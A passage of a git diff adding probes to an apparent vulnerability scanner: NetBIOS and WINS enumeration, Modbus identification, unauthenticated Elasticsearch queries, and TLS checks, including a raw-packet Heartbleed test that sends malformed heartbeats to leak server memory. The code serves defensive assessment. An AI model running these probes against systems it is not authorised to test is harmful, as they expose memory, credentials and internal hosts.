= {"banner": None, "netbios_names": [], "wins_responded": False} + + # -- Build NetBIOS wildcard node-status query (RFC 1002) -- + tid = struct.pack('>H', random.randint(0, 0xFFFF)) + # Flags: 0x0010 (recursion desired) + # Questions: 1, Answers/Auth/Additional: 0 + header = tid + struct.pack('>HHHHH', 0x0010, 1, 0, 0, 0) + # Encoded wildcard name "*" (first-level NetBIOS encoding) + # '*' (0x2A) → half-bytes 0x02, 0x0A → chars 'C','K', padded with 'A' (0x00 half-bytes) + qname = b'\x20' + b'CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + b'\x00' + # Type: NBSTAT (0x0021), Class: IN (0x0001) + question = struct.pack('>HH', 0x0021, 0x0001) + nbns_query = header + qname + question + + def _parse_nbns_response(data): + """Parse a NetBIOS node-status response and return list of (name, suffix, flags).""" + names = [] + if len(data) < 14: + return names + # Verify transaction ID matches + if data[:2] != tid: + return names + ancount = struct.unpack('>H', data[6:8])[0] + if ancount == 0: + return names + # Skip past header (12 bytes) then answer name (compressed pointer or full) + idx = 12 + if idx < len(data) and data[idx] & 0xC0 == 0xC0: + idx += 2 + else: + while idx < len(data) and data[idx] != 0: + idx += data[idx] + 1 + idx += 1 + # Type (2) + Class (2) + TTL (4) + RDLength (2) = 10 bytes + if idx + 10 > len(data): + return names + idx += 10 + if idx >= len(data): + return names + num_names = data[idx] + idx += 1 + # Each name entry: 15 bytes name + 1 byte suffix + 2 bytes flags = 18 bytes + for _ in range(num_names): + if idx + 18 > len(data): + break + name_bytes = data[idx:idx + 15] + suffix = data[idx + 15] + flags = struct.unpack('>H', data[idx + 16:idx + 18])[0] + name = name_bytes.decode('ascii', errors='ignore').rstrip() + names.append((name, suffix, flags)) + idx += 18 + return names + + def _udp_nbns_probe(udp_port): + """Send UDP NBNS wildcard query, return parsed names or empty list.""" + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(3) + sock.sendto(nbns_query, (target, udp_port)) + data, _ = sock.recvfrom(1024) + return _parse_nbns_response(data) + except Exception: + return [] + finally: + if sock is not None: + sock.close() + + def _add_nbns_findings(names, probe_label): + """Populate raw data and findings from enumerated NetBIOS names.""" + raw["netbios_names"] = [ + {"name": n, "suffix": f"0x{s:02X}", "type": self._NBNS_SUFFIX_TYPES.get(s, f"Unknown(0x{s:02X})")} + for n, s, _f in names + ] + name_list = "; ".join( + f"{n} <{s:02X}> ({self._NBNS_SUFFIX_TYPES.get(s, 'unknown')})" + for n, s, _f in names + ) + findings.append(Finding( + severity=Severity.HIGH, + title="NetBIOS name enumeration successful", + description=( + f"{probe_label} responded to a wildcard node-status query, " + "leaking computer name, domain membership, and potentially logged-in users." + ), + evidence=f"Names: {name_list[:200]}", + remediation="Block UDP port 137 at the firewall; disable NetBIOS over TCP/IP in network adapter settings.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + findings.append(Finding( + severity=Severity.INFO, + title=f"NetBIOS names discovered ({len(names)} entries)", + description=f"Enumerated names: {name_list}", + evidence=f"Names: {name_list[:300]}", + confidence="certain", + )) + + try: + if port == 137: + # -- Direct UDP NBNS probe -- + names = _udp_nbns_probe(137) + if names: + raw["banner"] = f"NBNS: {len(names)} name(s) enumerated" + _add_nbns_findings(names, f"NBNS on {target}:{port}") + else: + raw["banner"] = "NBNS port open (no response to wildcard query)" + findings.append(Finding( + severity=Severity.INFO, + title="NBNS port open but no names returned", + description=f"UDP port {port} on {target} did not respond to NetBIOS wildcard query.", + confidence="tentative", + )) + else: + # -- TCP WINS replication probe (MS-WINSRA Association Start Request) -- + # Also attempt UDP NBNS side-probe to port 137 for name enumeration + names = _udp_nbns_probe(137) + if names: + _add_nbns_findings(names, f"NBNS side-probe to {target}:137") + + # Build MS-WINSRA Association Start Request per [MS-WINSRA] §2.2.3: + # Common Header (16 bytes): + # Packet Length: 41 (0x00000029) — excludes this field + # Reserved: 0x00007800 (opcode, ignored by spec) + # Destination Assoc Handle: 0x00000000 (first message, unknown) + # Message Type: 0x00000000 (Association Start Request) + # Body (25 bytes): + # Sender Assoc Handle: random 4 bytes + # NBNS Major Version: 2 (required) + # NBNS Minor Version: 5 (Win2k+) + # Reserved: 21 zero bytes (pad to 41) + sender_ctx = random.randint(1, 0xFFFFFFFF) + wrepl_header = struct.pack('>I', 41) # Packet Length + wrepl_header += struct.pack('>I', 0x00007800) # Reserved / opcode + wrepl_header += struct.pack('>I', 0) # Destination Assoc Handle + wrepl_header += struct.pack('>I', 0) # Message Type: Start Request + wrepl_body = struct.pack('>I', sender_ctx) # Sender Assoc Handle + wrepl_body += struct.pack('>HH', 2, 5) # Major=2, Minor=5 + wrepl_body += b'\x00' * 21 # Reserved padding + wrepl_packet = wrepl_header + wrepl_body + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + sock.sendall(wrepl_packet) + + # Distinguish three recv outcomes: + # data received → parse as WREPL (confirmed WINS) + # timeout → connection held open, no reply (likely WINS, non-partner) + # empty / closed → server sent FIN immediately (unconfirmed service) + data = None + recv_timed_out = False + try: + data = sock.recv(1024) + except socket.timeout: + recv_timed_out = True + finally: + sock.close() + + if data and len(data) >= 20: + raw["wins_responded"] = True + # Parse response: first 4 bytes = Packet Length, next 16 = common header + resp_msg_type = struct.unpack('>I', data[12:16])[0] if len(data) >= 16 else None + version_info = "" + if resp_msg_type == 1 and len(data) >= 24: + # Association Start Response — extract version + resp_major = struct.unpack('>H', data[20:22])[0] if len(data) >= 22 else None + resp_minor = struct.unpack('>H', data[22:24])[0] if len(data) >= 24 else None + if resp_major is not None: + version_info = f" (NBNS version {resp_major}.{resp_minor})" + raw["nbns_version"] = {"major": resp_major, "minor": resp_minor} + raw["banner"] = f"WINS replication service{version_info}" + findings.append(Finding( + severity=Severity.MEDIUM, + title="WINS replication service exposed", + description=( + f"WINS on {target}:{port} responded to a WREPL Association Start Request{version_info}. " + "WINS is a legacy name-resolution service vulnerable to spoofing, enumeration, and " + "multiple remote code execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924). " + "It should not be accessible from untrusted networks." + ), + evidence=f"WREPL response ({len(data)} bytes): {data[:24].hex()}", + remediation=( + "Decommission WINS or restrict TCP port 42 to trusted replication partners. " + "If WINS is required, apply all patches (MS04-045, MS09-039) and set the registry key " + "RplOnlyWCnfPnrs=1 to accept replication only from configured partners." + ), + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + elif data: + # Got some data but not enough for a valid WREPL response + raw["wins_responded"] = True + raw["banner"] = f"Port {port} responded ({len(data)} bytes, non-WREPL)" + findings.append(Finding( + severity=Severity.LOW, + title=f"Service on port {port} responded but is not standard WINS", + description=( + f"TCP port {port} on {target} returned data that does not match the " + "WINS replication protocol (MS-WINSRA). Another service may be listening." + ), + evidence=f"Response ({len(data)} bytes): {data[:32].hex()}", + confidence="tentative", + )) + elif recv_timed_out: + # Connection accepted AND held open after our WREPL packet, but no + # reply — consistent with WINS silently dropping a non-partner request + # (RplOnlyWCnfPnrs=1). A non-WINS service would typically RST or FIN. + raw["banner"] = "WINS likely (connection held, no WREPL reply)" + findings.append(Finding( + severity=Severity.MEDIUM, + title="WINS replication port open (non-partner rejected)", + description=( + f"TCP port {port} on {target} accepted a WREPL Association Start Request " + "and held the connection open without responding, consistent with a WINS " + "server configured to reject non-partner replication (RplOnlyWCnfPnrs=1). " + "An exposed WINS port is a legacy attack surface subject to remote code " + "execution flaws (CVE-2004-1080, CVE-2009-1923, CVE-2009-1924)." + ), + evidence="TCP connection accepted and held open; WREPL handshake: no reply after 3 s", + remediation=( + "Block TCP port 42 at the firewall if WINS replication is not needed. " + "If required, restrict to trusted replication partners only." + ), + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="firm", + )) + else: + # recv returned empty — server immediately closed the connection. + # Cannot confirm WINS; don't produce a finding. The port scan + # already reports the open port; a "service unconfirmed" finding + # adds no actionable value to the report. + pass + except Exception as e: + return probe_error(target, port, "WINS/NBNS", e) + + if not findings: + # Could not confirm WINS — downgrade the protocol label so the UI + # does not display an unverified "WINS" tag from WELL_KNOWN_PORTS. + port_protocols = self.state.get("port_protocols") + if port_protocols and port_protocols.get(port) in ("wins", "nbns"): + port_protocols[port] = "unknown" + return None + + return probe_result(raw_data=raw, findings=findings) + + def _service_info_modbus(self, target, port): # default port: 502 + """ + Send Modbus device identification request to detect exposed PLCs. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + request = b'\x00\x01\x00\x00\x00\x06\x01\x2b\x0e\x01\x00' + sock.sendall(request) + data = sock.recv(256) + if data: + readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) + raw["banner"] = readable.strip()[:120] + findings.append(Finding( + severity=Severity.CRITICAL, + title="Modbus device responded to identification request", + description=f"Industrial control system on {target}:{port} is accessible without authentication. " + "Modbus has no built-in security — any network access means full device control.", + evidence=f"Device ID response: {readable.strip()[:80]}", + remediation="Isolate Modbus devices on a dedicated OT network; deploy a Modbus-aware firewall.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "Modbus", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_elasticsearch(self, target, port): # default port: 9200 + """ + Deep Elasticsearch probe: cluster info, index listing, node IPs, CVE matching. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings, raw = [], {"cluster_name": None, "version": None} + base_url = f"http://{target}" if port == 80 else f"http://{target}:{port}" + + # First check if this is actually Elasticsearch (GET / must return JSON with cluster_name or tagline) + findings += self._es_check_root(base_url, raw) + if not raw["cluster_name"] and not raw.get("tagline"): + # Not Elasticsearch — skip further probing to avoid noise on regular HTTP ports + return None + + findings += self._es_check_indices(base_url, raw) + findings += self._es_check_nodes(base_url, raw) + + if raw["version"]: + findings += check_cves("elasticsearch", raw["version"]) + + if not findings: + findings.append(Finding(Severity.INFO, "Elasticsearch probe clean", "No issues detected.")) + + return probe_result(raw_data=raw, findings=findings) + + def _es_check_root(self, base_url, raw): + """GET / — extract version, cluster name.""" + findings = [] + try: + resp = requests.get(base_url, timeout=3) + if resp.ok: + try: + data = resp.json() + raw["cluster_name"] = data.get("cluster_name") + ver_info = data.get("version", {}) + raw["version"] = ver_info.get("number") if isinstance(ver_info, dict) else None + raw["tagline"] = data.get("tagline") + findings.append(Finding( + severity=Severity.HIGH, + title=f"Elasticsearch cluster metadata exposed", + description=f"Cluster '{raw['cluster_name']}' version {raw['version']} accessible without auth.", + evidence=f"cluster={raw['cluster_name']}, version={raw['version']}", + remediation="Enable X-Pack security or restrict network access.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + if 'cluster_name' in resp.text: + findings.append(Finding( + severity=Severity.HIGH, + title="Elasticsearch cluster metadata exposed", + description=f"Cluster metadata accessible at {base_url}.", + evidence=resp.text[:200], + remediation="Enable authentication.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="firm", + )) + except Exception: + pass + return findings + + def _es_check_indices(self, base_url, raw): + """GET /_cat/indices — list accessible indices.""" + findings = [] + try: + resp = requests.get(f"{base_url}/_cat/indices?v", timeout=3) + if resp.ok and resp.text.strip(): + lines = resp.text.strip().split("\n") + index_count = max(0, len(lines) - 1) # subtract header + raw["index_count"] = index_count + if index_count > 0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"Elasticsearch {index_count} indices accessible", + description=f"{index_count} indices listed without authentication.", + evidence="\n".join(lines[:6]), + remediation="Enable authentication and restrict index access.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + except Exception: + pass + return findings + + def _es_check_nodes(self, base_url, raw): + """GET /_nodes — extract transport/publish addresses, classify IPs, check JVM.""" + findings = [] + try: + resp = requests.get(f"{base_url}/_nodes", timeout=3) + if resp.ok: + data = resp.json() + nodes = data.get("nodes", {}) + ips = set() + for node in nodes.values(): + for key in ("transport_address", "publish_address", "host"): + val = node.get(key) or "" + ip = val.rsplit(":", 1)[0] if ":" in val else val + if ip and ip not in ("127.0.0.1", "localhost", "0.0.0.0"): + ips.add(ip) + settings = node.get("settings", {}) + if isinstance(settings, dict): + net = settings.get("network", {}) + if isinstance(net, dict): + for k in ("host", "publish_host"): + v = net.get(k) + if v and v not in ("127.0.0.1", "localhost", "0.0.0.0"): + ips.add(v) + + if ips: + import ipaddress as _ipaddress + raw["node_ips"] = list(ips) + public_ips, private_ips = [], [] + for ip_str in ips: + try: + is_priv = _ipaddress.ip_address(ip_str).is_private + except (ValueError, TypeError): + is_priv = True # assume private on parse failure + if is_priv: + private_ips.append(ip_str) + else: + public_ips.append(ip_str) + self._emit_metadata("internal_ips", {"ip": ip_str, "source": "es_nodes"}) + + if public_ips: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"Elasticsearch leaks real public IP: {', '.join(sorted(public_ips)[:3])}", + description="The _nodes endpoint exposes public IP addresses, potentially revealing " + "the real infrastructure behind NAT/VPN/honeypot.", + evidence=f"Public IPs: {', '.join(sorted(public_ips))}", + remediation="Restrict /_nodes endpoint; configure network.publish_host to a safe value.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + if private_ips: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"Elasticsearch node internal IPs disclosed ({len(private_ips)})", + description=f"Node API exposes internal IPs: {', '.join(sorted(private_ips)[:5])}", + evidence=f"IPs: {', '.join(sorted(private_ips)[:10])}", + remediation="Restrict /_nodes endpoint access.", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + + # --- JVM version extraction --- + for node in nodes.values(): + jvm = node.get("jvm", {}) + if isinstance(jvm, dict): + jvm_version = jvm.get("version") + if jvm_version: + raw["jvm_version"] = jvm_version + try: + if jvm_version.startswith("1."): + # Java 1.x format: 1.7.0_55 → major=7, 1.8.0_345 → major=8 + major = int(jvm_version.split(".")[1]) + else: + # Modern format: 17.0.5 → major=17 + major = int(str(jvm_version).split(".")[0]) + if major <= 8: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"Elasticsearch running on EOL JVM: Java {jvm_version}", + description=f"Java {jvm_version} is end-of-life and no longer receives security patches.", + evidence=f"jvm.version={jvm_version}", + remediation="Upgrade to a supported Java LTS release (17+).", + owasp_id="A06:2021", + cwe_id="CWE-1104", + confidence="certain", + )) + except (ValueError, IndexError): + pass + break # one node is enough + except Exception: + pass + return findings diff --git a/extensions/business/cybersec/red_mesh/worker/service/tls.py b/extensions/business/cybersec/red_mesh/worker/service/tls.py new file mode 100644 index 00000000..02dc2e20 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/tls.py @@ -0,0 +1,744 @@ +import random +import re as _re +import socket +import struct +import ssl + +import requests + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + + +class _ServiceTlsMixin(_ServiceProbeBase): + """TLS inspection and generic service fingerprinting probes.""" + + def _service_info_tls(self, target, port): + """ + Inspect TLS handshake, certificate chain, and cipher strength. + + Uses a two-pass approach: unverified connect (always gets protocol/cipher), + then verified connect (detects self-signed / chain issues). + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings with protocol, cipher, cert details. + """ + from datetime import datetime + + findings = [] + raw = {"protocol": None, "cipher": None, "cert_subject": None, "cert_issuer": None} + + # Pass 1: Unverified — always get protocol/cipher + proto, cipher, cert_der = self._tls_unverified_connect(target, port) + if proto is None: + return probe_error(target, port, "TLS", Exception("unverified connect failed")) + + raw["protocol"], raw["cipher"] = proto, cipher + findings += self._tls_check_protocol(proto, cipher) + + # Pass 1b: SAN parsing and signature check from DER cert + if cert_der: + san_dns, san_ips = self._tls_parse_san_from_der(cert_der) + raw["san_dns"] = san_dns + raw["san_ips"] = san_ips + for ip_str in san_ips: + try: + import ipaddress as _ipaddress + if _ipaddress.ip_address(ip_str).is_private: + self._emit_metadata("internal_ips", {"ip": ip_str, "source": f"tls_san:{port}"}) + except (ValueError, TypeError): + pass + findings += self._tls_check_signature_algorithm(cert_der) + findings += self._tls_check_validity_period(cert_der) + + # Pass 2: Verified — detect self-signed / chain issues + findings += self._tls_check_certificate(target, port, raw) + + # Pass 3: Cert content checks (expiry, default CN) + findings += self._tls_check_expiry(raw) + findings += self._tls_check_default_cn(raw) + + # Pass 4: Heartbleed (CVE-2014-0160) + heartbleed = self._tls_check_heartbleed(target, port) + if heartbleed: + findings.append(heartbleed) + + # Pass 5: Downgrade attacks (POODLE / BEAST) + findings += self._tls_check_downgrade(target, port) + + if not findings: + findings.append(Finding(Severity.INFO, f"TLS {proto} {cipher}", "TLS configuration adequate.")) + + return probe_result(raw_data=raw, findings=findings) + + def _tls_unverified_connect(self, target, port): + """Unverified TLS connect to get protocol, cipher, and DER cert.""" + try: + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + with socket.create_connection((target, port), timeout=3) as sock: + with ctx.wrap_socket(sock, server_hostname=target) as ssock: + proto = ssock.version() + cipher_info = ssock.cipher() + cipher_name = cipher_info[0] if cipher_info else "unknown" + cert_der = ssock.getpeercert(binary_form=True) + return proto, cipher_name, cert_der + except Exception as e: + self.P(f"TLS unverified connect failed on {target}:{port}: {e}", color='y') + return None, None, None + + def _tls_check_protocol(self, proto, cipher): + """Flag obsolete TLS/SSL protocols and weak ciphers.""" + findings = [] + if proto and proto.upper() in ("SSLV2", "SSLV3", "TLSV1", "TLSV1.1"): + findings.append(Finding( + severity=Severity.HIGH, + title=f"Obsolete TLS protocol: {proto}", + description=f"Server negotiated {proto} with cipher {cipher}. " + f"SSLv2/v3 and TLS 1.0/1.1 are deprecated and vulnerable.", + evidence=f"protocol={proto}, cipher={cipher}", + remediation="Disable SSLv2/v3/TLS 1.0/1.1 and require TLS 1.2+.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + if cipher and any(w in cipher.lower() for w in ("rc4", "des", "null", "export")): + findings.append(Finding( + severity=Severity.HIGH, + title=f"Weak TLS cipher: {cipher}", + description=f"Cipher {cipher} is considered cryptographically weak.", + evidence=f"cipher={cipher}", + remediation="Disable weak ciphers (RC4, DES, NULL, EXPORT).", + owasp_id="A02:2021", + cwe_id="CWE-327", + confidence="certain", + )) + return findings + + def _tls_check_certificate(self, target, port, raw): + """Verified TLS pass — detect self-signed, untrusted issuer, hostname mismatch.""" + from datetime import datetime + + findings = [] + try: + ctx = ssl.create_default_context() + with socket.create_connection((target, port), timeout=3) as sock: + with ctx.wrap_socket(sock, server_hostname=target) as ssock: + cert = ssock.getpeercert() + subj = dict(x[0] for x in cert.get("subject", ())) + issuer = dict(x[0] for x in cert.get("issuer", ())) + raw["cert_subject"] = subj.get("commonName") + raw["cert_issuer"] = issuer.get("organizationName") or issuer.get("commonName") + raw["cert_not_after"] = cert.get("notAfter") + except ssl.SSLCertVerificationError as e: + err_msg = str(e).lower() + if "self-signed" in err_msg or "self signed" in err_msg: + findings.append(Finding( + severity=Severity.MEDIUM, + title="Self-signed TLS certificate", + description="The server presents a self-signed certificate that browsers will reject.", + evidence=str(e), + remediation="Replace with a certificate from a trusted CA.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="certain", + )) + elif "hostname mismatch" in err_msg: + findings.append(Finding( + severity=Severity.MEDIUM, + title="TLS certificate hostname mismatch", + description=f"Certificate CN/SAN does not match {target}.", + evidence=str(e), + remediation="Ensure the certificate covers the served hostname.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="certain", + )) + else: + findings.append(Finding( + severity=Severity.MEDIUM, + title="TLS certificate validation failed", + description="Certificate chain could not be verified.", + evidence=str(e), + remediation="Use a certificate from a trusted CA with a valid chain.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="firm", + )) + except Exception: + pass # Non-cert errors (connection reset, etc.) — skip + return findings + + def _tls_check_expiry(self, raw): + """Check certificate expiry from raw dict.""" + from datetime import datetime + + findings = [] + expires = raw.get("cert_not_after") + if not expires: + return findings + try: + exp = datetime.strptime(expires, "%b %d %H:%M:%S %Y %Z") + days = (exp - datetime.utcnow()).days + raw["cert_days_remaining"] = days + if days < 0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"TLS certificate expired ({-days} days ago)", + description="The certificate has already expired.", + evidence=f"notAfter={expires}", + remediation="Renew the certificate immediately.", + owasp_id="A02:2021", + cwe_id="CWE-298", + confidence="certain", + )) + elif days <= 30: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"TLS certificate expiring soon ({days} days)", + description=f"Certificate expires in {days} days.", + evidence=f"notAfter={expires}", + remediation="Renew the certificate before expiry.", + owasp_id="A02:2021", + cwe_id="CWE-298", + confidence="certain", + )) + except Exception: + pass + return findings + + def _tls_check_default_cn(self, raw): + """Flag placeholder common names.""" + findings = [] + cn = raw.get("cert_subject") + if not cn: + return findings + cn_lower = cn.lower() + placeholders = ("example.com", "localhost", "internet widgits", "test", "changeme", "my company", "acme", "default") + if any(p in cn_lower for p in placeholders) or len(cn.strip()) <= 1: + findings.append(Finding( + severity=Severity.LOW, + title=f"TLS certificate placeholder CN: {cn}", + description="Certificate uses a default/placeholder common name.", + evidence=f"CN={cn}", + remediation="Replace with a certificate bearing the correct hostname.", + owasp_id="A02:2021", + cwe_id="CWE-295", + confidence="firm", + )) + return findings + + def _tls_parse_san_from_der(self, cert_der): + """Parse SAN DNS names and IP addresses from a DER-encoded certificate.""" + dns_names, ip_addresses = [], [] + if not cert_der: + return dns_names, ip_addresses + try: + from cryptography import x509 + cert = x509.load_der_x509_certificate(cert_der) + try: + san_ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName) + dns_names = san_ext.value.get_values_for_type(x509.DNSName) + ip_addresses = [str(ip) for ip in san_ext.value.get_values_for_type(x509.IPAddress)] + except x509.ExtensionNotFound: + pass + except Exception: + pass + return dns_names, ip_addresses + + def _tls_check_signature_algorithm(self, cert_der): + """Flag SHA-1 or MD5 signature algorithms.""" + findings = [] + if not cert_der: + return findings + try: + from cryptography import x509 + from cryptography.hazmat.primitives import hashes + cert = x509.load_der_x509_certificate(cert_der) + algo = cert.signature_hash_algorithm + if algo and isinstance(algo, (hashes.SHA1, hashes.MD5)): + algo_name = algo.name.upper() + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"TLS certificate signed with weak algorithm: {algo_name}", + description=f"The certificate uses {algo_name} for its signature, which is cryptographically weak.", + evidence=f"signature_algorithm={algo_name}", + remediation="Replace with a certificate using SHA-256 or stronger.", + owasp_id="A02:2021", + cwe_id="CWE-327", + confidence="certain", + )) + except Exception: + pass + return findings + + def _tls_check_validity_period(self, cert_der): + """Flag certificates with a total validity span >5 years (CA/Browser Forum violation).""" + findings = [] + if not cert_der: + return findings + try: + from cryptography import x509 + cert = x509.load_der_x509_certificate(cert_der) + span = cert.not_valid_after_utc - cert.not_valid_before_utc + if span.days > 5 * 365: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"TLS certificate validity span exceeds 5 years ({span.days} days)", + description="Certificates valid for more than 5 years violate CA/Browser Forum baseline requirements.", + evidence=f"not_before={cert.not_valid_before_utc}, not_after={cert.not_valid_after_utc}, span={span.days}d", + remediation="Reissue with a validity period of 398 days or less.", + owasp_id="A02:2021", + cwe_id="CWE-298", + confidence="certain", + )) + except Exception: + pass + return findings + + + def _tls_check_heartbleed(self, target, port): + """Test for Heartbleed (CVE-2014-0160) by sending a malformed TLS heartbeat. + + Builds a raw TLS connection, completes handshake, then sends a heartbeat + request with payload_length > actual payload. If the server responds with + more data than sent, it is leaking memory. + + Returns + ------- + Finding or None + CRITICAL finding if vulnerable, None otherwise. + """ + try: + # Connect and perform TLS handshake via ssl module + ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + # Allow older protocols for compatibility with vulnerable servers + ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED + + raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + raw_sock.settimeout(3) + raw_sock.connect((target, port)) + tls_sock = ctx.wrap_socket(raw_sock, server_hostname=target) + + # Get the negotiated TLS version for the heartbeat record + tls_version = tls_sock.version() + version_map = { + "TLSv1": b"\x03\x01", "TLSv1.1": b"\x03\x02", + "TLSv1.2": b"\x03\x03", "TLSv1.3": b"\x03\x03", + "SSLv3": b"\x03\x00", + } + tls_ver_bytes = version_map.get(tls_version, b"\x03\x01") + + # Build heartbeat request (ContentType=24, HeartbeatMessageType=1=request) + # payload_length is set to 16384 but actual payload is only 1 byte + # This is the essence of the Heartbleed attack: asking for more data than sent + hb_payload = b"\x01" # 1 byte actual payload + hb_msg = ( + b"\x01" # HeartbeatMessageType: request + + b"\x40\x00" # payload_length: 16384 (0x4000) + + hb_payload # actual payload: 1 byte + + b"\x00" * 16 # padding (16 bytes) + ) + + # TLS record: ContentType=24 (Heartbeat), version, length + tls_record = ( + b"\x18" # ContentType: Heartbeat + + tls_ver_bytes # TLS version + + struct.pack(">H", len(hb_msg)) + + hb_msg + ) + + # Send via the underlying raw socket (bypassing ssl module) + # We need to access the raw socket after handshake + # The ssl wrapper doesn't let us send raw records, so use raw_sock. + # After wrap_socket, raw_sock is consumed. Instead, use tls_sock.unwrap() + # to get the raw socket back. + try: + raw_after = tls_sock.unwrap() + raw_after.sendall(tls_record) + raw_after.settimeout(3) + response = raw_after.recv(65536) + raw_after.close() + except (ssl.SSLError, OSError): + # If unwrap fails, try closing and testing with a new raw connection + tls_sock.close() + return self._tls_heartbleed_raw(target, port, tls_ver_bytes) + + if response and len(response) >= 7: + # Check if response is a heartbeat response (ContentType=24) + if response[0] == 24: + resp_len = struct.unpack(">H", response[3:5])[0] + # If server sent back more than we sent (3 bytes of heartbeat msg), + # it leaked memory + if resp_len > len(hb_msg): + return Finding( + severity=Severity.CRITICAL, + title="TLS Heartbleed vulnerability (CVE-2014-0160)", + description=f"Server at {target}:{port} is vulnerable to Heartbleed. " + "An attacker can read up to 64KB of server memory per request, " + "potentially exposing private keys, session tokens, and passwords.", + evidence=f"Heartbeat response size ({resp_len} bytes) > request payload size ({len(hb_msg)} bytes). " + f"Leaked {resp_len - len(hb_msg)} bytes of server memory.", + remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", + owasp_id="A06:2021", + cwe_id="CWE-126", + confidence="certain", + ) + # TLS Alert (ContentType=21) = not vulnerable (server rejected heartbeat) + elif response[0] == 21: + return None + + except Exception: + pass + return None + + def _tls_heartbleed_raw(self, target, port, tls_ver_bytes): + """Fallback Heartbleed test using a raw TLS ClientHello with heartbeat extension. + + This is needed when ssl.unwrap() fails. We build a minimal TLS 1.0 + ClientHello that advertises the heartbeat extension, complete the handshake, + and then send the malformed heartbeat. + + Returns + ------- + Finding or None + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(5) + sock.connect((target, port)) + + # Minimal TLS 1.0 ClientHello with heartbeat extension + # This is a simplified approach: we use struct to build the exact bytes + hello = bytearray() + # Handshake header: ClientHello (0x01) + # Random: 32 bytes + client_random = random.randbytes(32) + # Session ID: 0 bytes + # Cipher suites: a few common ones + ciphers = ( + b"\x00\x2f" # TLS_RSA_WITH_AES_128_CBC_SHA + b"\x00\x35" # TLS_RSA_WITH_AES_256_CBC_SHA + b"\x00\x0a" # TLS_RSA_WITH_3DES_EDE_CBC_SHA + ) + # Compression: null only + compression = b"\x01\x00" + # Extensions: heartbeat (type 0x000f, length 1, mode=1 peer allowed to send) + heartbeat_ext = struct.pack(">HH", 0x000f, 1) + b"\x01" + extensions = heartbeat_ext + + client_hello_body = ( + b"\x03\x01" # TLS 1.0 + + client_random + + b"\x00" # Session ID length: 0 + + struct.pack(">H", len(ciphers)) + ciphers + + compression + + struct.pack(">H", len(extensions)) + extensions + ) + + # Handshake message: type=1 (ClientHello), length + handshake = b"\x01" + struct.pack(">I", len(client_hello_body))[1:] + client_hello_body + + # TLS record: ContentType=22 (Handshake), version=TLS 1.0 + tls_record = b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake + sock.sendall(tls_record) + + # Read ServerHello + Certificate + ServerHelloDone + # We just need to consume enough to complete the handshake + server_response = b"" + for _ in range(10): + try: + chunk = sock.recv(16384) + if not chunk: + break + server_response += chunk + # Check if we received ServerHelloDone (handshake type 0x0e) + if b"\x0e\x00\x00\x00" in server_response: + break + except (socket.timeout, OSError): + break + + if not server_response: + sock.close() + return None + + # Now send the malformed heartbeat + hb_msg = b"\x01\x40\x00" + b"\x41" + b"\x00" * 16 # type=request, length=16384, 1 byte payload + padding + hb_record = b"\x18\x03\x01" + struct.pack(">H", len(hb_msg)) + hb_msg + sock.sendall(hb_record) + + # Read response + sock.settimeout(3) + try: + response = sock.recv(65536) + except (socket.timeout, OSError): + response = b"" + sock.close() + + if response and len(response) >= 7 and response[0] == 24: + resp_payload_len = struct.unpack(">H", response[3:5])[0] + if resp_payload_len > len(hb_msg): + return Finding( + severity=Severity.CRITICAL, + title="TLS Heartbleed vulnerability (CVE-2014-0160)", + description=f"Server at {target}:{port} is vulnerable to Heartbleed. " + "An attacker can read up to 64KB of server memory per request, " + "potentially exposing private keys, session tokens, and passwords.", + evidence=f"Heartbeat response ({resp_payload_len} bytes) exceeded request size.", + 